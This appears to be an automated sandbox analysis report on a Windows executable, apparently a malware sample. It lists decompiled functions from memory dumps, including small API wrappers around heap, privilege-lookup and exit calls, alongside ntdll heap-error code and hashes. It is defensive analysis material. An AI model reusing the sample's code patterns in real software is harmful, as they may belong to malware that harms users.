API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184C3, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cc11fb4038f86766aef67f9d1e758264f0e7aa3c8917d03db27bcf5c13f74df1
Instruction ID: f719f499f87490d03f0eff811c2497c6fa7ec7a9a0fca8ac2bc864059ceaab07
Opcode Fuzzy Hash: cc11fb4038f86766aef67f9d1e758264f0e7aa3c8917d03db27bcf5c13f74df1
Instruction Fuzzy Hash: 81F0E278204305BFD714DF69CC41DE77BA8AF85345F004A59F94817642CA30ED04CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t7 = _a4;
				E00418DC0(_t15, _t7, _t7 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418493
0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 01A2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A29694

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2610cae3dee6581e20f9778aa5f87fba8b1754ccce24ef8f5f7f25fc23f554af
Instruction ID: caf5736ba684ce690f3f4c8ea4b8d7fa00bda7f825ed1a4c7511b5d0e5f2a29e
Opcode Fuzzy Hash: 2610cae3dee6581e20f9778aa5f87fba8b1754ccce24ef8f5f7f25fc23f554af
Instruction Fuzzy Hash: 87B09B719014D5C9D611D7B44608727794077D0745F56C061E1020641B8778C095F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01A9B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

Go determine why that thread has not released the critical section., xrefs: 01A9B3C5
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01A9B2F3
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A9B2DC
*** Inpage error in %ws:%s, xrefs: 01A9B418
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A9B47D
<unknown>, xrefs: 01A9B27E, 01A9B2D1, 01A9B350, 01A9B399, 01A9B417, 01A9B48E
The resource is owned shared by %d threads, xrefs: 01A9B37E
The critical section is owned by thread %p., xrefs: 01A9B3B9
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A9B476
an invalid address, %p, xrefs: 01A9B4CF
This failed because of error %Ix., xrefs: 01A9B446
*** enter .exr %p for the exception record, xrefs: 01A9B4F1
The resource is owned exclusively by thread %p, xrefs: 01A9B374
write to, xrefs: 01A9B4A6
*** Resource timeout (%p) in %ws:%s, xrefs: 01A9B352
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A9B484
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A9B305
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A9B314
a NULL pointer, xrefs: 01A9B4E0
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A9B3D6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A9B323
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A9B38F
The instruction at %p tried to %s , xrefs: 01A9B4B6
*** An Access Violation occurred in %ws:%s, xrefs: 01A9B48F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A9B53F
The instruction at %p referenced memory at %p., xrefs: 01A9B432
*** enter .cxr %p for the context, xrefs: 01A9B50D
*** then kb to get the faulting stack, xrefs: 01A9B51C
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A9B39B
read from, xrefs: 01A9B4AD, 01A9B4B2

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 06917a1944c07e730daaa620fc67ea5415b4849d3ab4dbdbae4769eab61ae0c7
Instruction ID: 1137c0889444023dbc5af1e7a1ca36c6914e655264cc3f40f3ee17ec384f937b
Opcode Fuzzy Hash: 06917a1944c07e730daaa620fc67ea5415b4849d3ab4dbdbae4769eab61ae0c7
Instruction Fuzzy Hash: 6E814635A40200FFDF21AB5AEC85E7B7FB5EF96A52F048088F5082F552D3618581DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 01AA1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01AA1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x19c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019EB150();
				} else {
					E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1ad589c);
				E019EB150("Heap error detected at %p (heap handle %p)\n",  *0x1ad58a0);
				_t27 =  *0x1ad5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01AA1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019EB150();
				} else {
					E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E019EB150("Error code: %d - %s\n",  *0x1ad5898);
				_t113 =  *0x1ad58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019EB150();
					} else {
						E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019EB150("Parameter1: %p\n",  *0x1ad58a4);
				}
				_t115 =  *0x1ad58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019EB150();
					} else {
						E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019EB150("Parameter2: %p\n",  *0x1ad58a8);
				}
				_t117 =  *0x1ad58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019EB150();
					} else {
						E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019EB150("Parameter3: %p\n",  *0x1ad58ac);
				}
				_t119 =  *0x1ad58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019EB150();
					} else {
						E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1ad58b4);
					E019EB150("Last known valid blocks: before - %p, after - %p\n",  *0x1ad58b0);
				} else {
					_t120 =  *0x1ad58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019EB150();
				} else {
					E019EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E019EB150("Stack trace available at %p\n", 0x1ad58c0);
			}

0x01aa1c10
0x01aa1c16
0x01aa1c1e
0x01aa1c3d
0x01aa1c3e
0x01aa1c20
0x01aa1c35
0x01aa1c3a
0x01aa1c44
0x01aa1c55
0x01aa1c5a
0x01aa1c65
0x01aa1c67
0x00000000
0x01aa1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01aa1c67
0x01aa1cdc
0x01aa1ce5
0x01aa1d04
0x01aa1d05
0x01aa1ce7
0x01aa1cfc
0x01aa1d01
0x01aa1d0b
0x01aa1d17
0x01aa1d1f
0x01aa1d25
0x01aa1d30
0x01aa1d4f
0x01aa1d50
0x01aa1d32
0x01aa1d47
0x01aa1d4c
0x01aa1d61
0x01aa1d67
0x01aa1d68
0x01aa1d6e
0x01aa1d79
0x01aa1d98
0x01aa1d99
0x01aa1d7b
0x01aa1d90
0x01aa1d95
0x01aa1daa
0x01aa1db0
0x01aa1db1
0x01aa1db7
0x01aa1dc2
0x01aa1de1
0x01aa1de2
0x01aa1dc4
0x01aa1dd9
0x01aa1dde
0x01aa1df3
0x01aa1df9
0x01aa1dfa
0x01aa1e00
0x01aa1e0a
0x01aa1e13
0x01aa1e32
0x01aa1e33
0x01aa1e15
0x01aa1e2a
0x01aa1e2f
0x01aa1e39
0x01aa1e4a
0x01aa1e02
0x01aa1e02
0x01aa1e08
0x00000000
0x00000000
0x01aa1e08
0x01aa1e5b
0x01aa1e7a
0x01aa1e7b
0x01aa1e5d
0x01aa1e72
0x01aa1e77
0x01aa1e95

Strings

heap_failure_buffer_underrun, xrefs: 01AA1C9F
heap_failure_usage_after_free, xrefs: 01AA1CBB
Error code: %d - %s, xrefs: 01AA1D12
Parameter2: %p, xrefs: 01AA1DA5
heap_failure_block_not_busy, xrefs: 01AA1CA6
heap_failure_buffer_overrun, xrefs: 01AA1C98
heap_failure_generic, xrefs: 01AA1C7C
heap_failure_entry_corruption, xrefs: 01AA1C83
heap_failure_listentry_corruption, xrefs: 01AA1CD0
HEAP[%wZ]: , xrefs: 01AA1C30, 01AA1CF7, 01AA1D42, 01AA1D8B, 01AA1DD4, 01AA1E25, 01AA1E6D
heap_failure_virtual_block_corruption, xrefs: 01AA1C91
heap_failure_unknown, xrefs: 01AA1C75
heap_failure_multiple_entries_corruption, xrefs: 01AA1C8A
HEAP: , xrefs: 01AA1C16, 01AA1C3D, 01AA1D04, 01AA1D4F, 01AA1D98, 01AA1DE1, 01AA1E32, 01AA1E7A
heap_failure_freelists_corruption, xrefs: 01AA1CC9
heap_failure_internal, xrefs: 01AA1C6E
Parameter3: %p, xrefs: 01AA1DEE
heap_failure_lfh_bitmap_mismatch, xrefs: 01AA1CD7
Stack trace available at %p, xrefs: 01AA1E86
Last known valid blocks: before - %p, after - %p, xrefs: 01AA1E45
Parameter1: %p, xrefs: 01AA1D5C
heap_failure_invalid_allocation_type, xrefs: 01AA1CB4
heap_failure_invalid_argument, xrefs: 01AA1CAD
heap_failure_cross_heap_operation, xrefs: 01AA1CC2
Heap error detected at %p (heap handle %p), xrefs: 01AA1C50

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: f3fcd3a2903ca60ac64f84e0178e5614086f27dd0456387489f2a55a7fb3edc1
Instruction ID: 55c5c3413716cc2db61470f1993b9deae813984516ca33fbc21b5d6bd4f500df
Opcode Fuzzy Hash: f3fcd3a2903ca60ac64f84e0178e5614086f27dd0456387489f2a55a7fb3edc1
Instruction Fuzzy Hash: D2619D36912646EFD622AB8AD489E34B3F4FB44970F8D806EF50E5F301D724D8518B4A

Uniqueness

Uniqueness Score: -1.00%

Function 019F3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E019F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E019F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E019F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E019F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E019F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E019F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01A04620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E01A2F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01A31370(_t276, 0x19c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E01A2BB40(0,  &_v68, _t170);
									if(L019F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E01A2BB40(_t257,  &_v68, _t243);
								if(L019F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01A31370(_t278, 0x19c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01A04620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E01A2F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01A31370(_v16, 0x19c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E01A2BB40(_t262,  &_v68, _t244);
								if(L019F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01A31370(_t282, 0x19c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E01A2BB40(_t262,  &_v68, _t201);
							if(L019F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01A04620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E01A2F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01A31370(_t280, 0x19c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E01A2BB40(_t267,  &_v68, _t245);
							if(L019F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01A31370(_t284, 0x19c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E01A2BB40(_t267,  &_v68, _t224);
						if(L019F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x019f3d3c
0x019f3d42
0x019f3d44
0x019f3d46
0x019f3d49
0x019f3d4c
0x019f3d4f
0x019f3d52
0x019f3d55
0x019f3d58
0x019f3d5b
0x019f3d5f
0x019f3d61
0x019f3d66
0x01a48213
0x01a48218
0x019f4085
0x019f4088
0x019f408e
0x019f4094
0x019f409a
0x019f40a0
0x019f40a6
0x019f40a9
0x019f40af
0x019f40b6
0x019f40bd
0x019f40bd
0x019f3d83
0x01a4821f
0x01a48229
0x01a48238
0x01a48238
0x01a4823d
0x01a4823d
0x019f3da0
0x019f3daf
0x019f3db5
0x019f3dba
0x019f3dba
0x019f3dd4
0x019f3e94
0x019f3eab
0x019f3f6d
0x019f3f84
0x019f406b
0x019f406b
0x019f406e
0x019f406e
0x019f4070
0x019f4074
0x01a48351
0x01a48351
0x019f407a
0x019f407f
0x01a4835d
0x01a48370
0x01a48377
0x01a48379
0x01a4837c
0x01a4837c
0x01a4835d
0x00000000
0x019f407f
0x019f3f8a
0x019f3f8d
0x019f3f90
0x019f3f95
0x01a4830d
0x01a4830f
0x019f3f9b
0x019f3fac
0x019f3fae
0x019f3fb1
0x019f3fb1
0x019f3fb6
0x01a48317
0x01a4831a
0x00000000
0x019f3fbc
0x019f3fc1
0x019f3fc9
0x019f3fd7
0x019f3fda
0x019f3fdd
0x019f4021
0x019f4021
0x019f4029
0x019f4030
0x019f4044
0x019f4046
0x019f4046
0x019f4044
0x019f4049
0x01a48327
0x01a48334
0x01a48339
0x01a4833c
0x019f404f
0x019f404f
0x019f404f
0x019f4051
0x019f4056
0x019f4063
0x019f4063
0x019f4068
0x00000000
0x019f4068
0x019f3fdf
0x019f3fe2
0x019f3fe4
0x019f3fe7
0x019f3fef
0x019f4003
0x019f4005
0x019f4005
0x019f400c
0x019f4013
0x019f4016
0x019f4017
0x019f401b
0x019f401e
0x00000000
0x019f401e
0x019f3fb6
0x019f3eb1
0x019f3eb4
0x019f3eb7
0x019f3ebc
0x01a482a9
0x01a482ab
0x019f3ec2
0x019f3ed3
0x019f3ed5
0x019f3ed8
0x019f3ed8
0x019f3edd
0x01a482b3
0x01a482b6
0x00000000
0x019f3ee3
0x019f3ee8
0x019f3eed
0x019f3ef0
0x019f3ef3
0x019f3f02
0x019f3f05
0x019f3f08
0x01a482c0
0x01a482c3
0x01a482c5
0x01a482c8
0x01a482d0
0x01a482e4
0x01a482e6
0x01a482e6
0x01a482ed
0x01a482f4
0x01a482f7
0x01a482f8
0x01a482fc
0x01a482ff
0x01a482ff
0x019f3f0e
0x019f3f11
0x019f3f16
0x019f3f1d
0x019f3f31
0x01a48307
0x01a48307
0x019f3f31
0x019f3f39
0x019f3f48
0x019f3f4d
0x019f3f50
